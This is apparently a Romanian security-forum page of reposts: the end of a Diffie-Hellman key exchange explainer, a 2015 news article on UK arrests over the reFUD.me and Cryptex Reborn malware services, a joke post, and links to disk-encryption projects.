that it’s called a primitive root modulo n. The Benefits Alice and Bob have managed to generate the same number, but how does that solve this problem. Let’s look at this from Eve’s perspective. What Eve see’s from Alice and Bob’s DHKE Without any of the flags, the output shows what Eve can see only. In this example, Eve sees g and p as well as A and B. To determine what the secret key is, Eve needs to determine what a (or is, which means solving this equation for a: A = g^a mod p. As it turns out, this is a very tough equation to solve. These tough problems are often called trap door functions, functions that are easy to calculate in one direction, but not in the other (some doors you can’t come back from). This problem is specifically called the discrete logarithm problem, if you’re interested in looking further. That means that Alice and Bob have shared a number, over an insecure medium, without revealing what that number is. Using that number, they can now send messages that are encrypted that they both can decrypt. Yay! Now you know a little bit more about DHKE and how we protect our secrets. To promote further security, we actually will regenerate a key for each session. So if one of your keys traded in this manner is ever actually calculated, it only affects that session. This is what we call forward secrecy! I have two more concepts on deck to talk about soon (you may have noticed the git repository), the RSA algorithm for asymmetric encryption and HMACs. Once I have them completed the last sentence will contain links! Go forth and hack encrypt! References: https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange https://en.wikipedia.org/wiki/Discrete_logarithm_problem https://en.wikipedia.org/wiki/Primitive_root_modulo_n Malarkey Sursa: https://warroom.securestate.com/index.php/encryption-basics-dhke/

Alleged Malware Service Operators Arrested in UK By Eduard Kovacs on November 23, 2015 A partnership between the security firm Trend Micro and the United Kingdom’s National Crime Agency (NCA) resulted in the arrests of two individuals suspected of running a website that offered cybercrime services. The suspects, a man and a woman aged 22 from Colchester, Essex, are believed to have operated a counter antivirus service called reFUD.me and a crypting service named Cryptex Reborn. They have been released on bail until February 2016. Both the Cryptex Reborn and reFUD.me services have been disrupted as a result of the operation. ReFUD.me, which emerged in February 2015, allowed cybercriminals to upload their malware samples to see if they would be detected by the products of various antivirus companies. ReFUD.me was similar to VirusTotal, but unlike the Google-owned scanning service, it did not share scanned files with antivirus vendors. Before it was shut down, the reFUD.me website claimed that more than 1.2 million scans had been conducted since February 2015. One of the most recent features added to the cybercrime service, dubbed “scanwatch,” allowed users to constantly monitor the detection status of the files they uploaded. Cryptex Reborn, the evolution of a toolkit advertised since as early as October 2011, allowed malware developers to encrypt their files in an effort to make them “Fully UnDetectable” (FUD). Malware authors could use the product after paying a $20 monthly subscription fee or $90 for lifetime usage. The first versions of the tool, called Cryptex, Cryptex Lite and Cryptex Advanced, all surfaced in 2011. Cryptex Reborn, which is said to offer one of the most sophisticated forms of crypting seen in recent years, was first advertised on cybercrime forums in September 2014, said Trend Micro. “This investigation is the result of Trend Micro’s collaboration with the National Crime Agency of the UK (NCA) and other partners to tackle some of the core components that enable cybercriminal business models to exist,” said Martin Rösler, senior director of The Forward-Looking Threat Research team for Trend Micro. “Helping to take down operations such as this is part of our ongoing effort to keep the world safe for exchanging digital information, for both our customers and the Internet at large.” The collaboration between Trend Micro and the NCA is the result of a memorandum of understanding signed by the two organizations in July. Sursa: http://www.securityweek.com/alleged-malware-service-operators-arrested-uk

E bolnav, are cafenorologie. Trebuie sa facem niste donatii de expresso urgent!

https://veracrypt.codeplex.com/ https://ciphershed.org/ https://truecrypt.ch/

Clasic: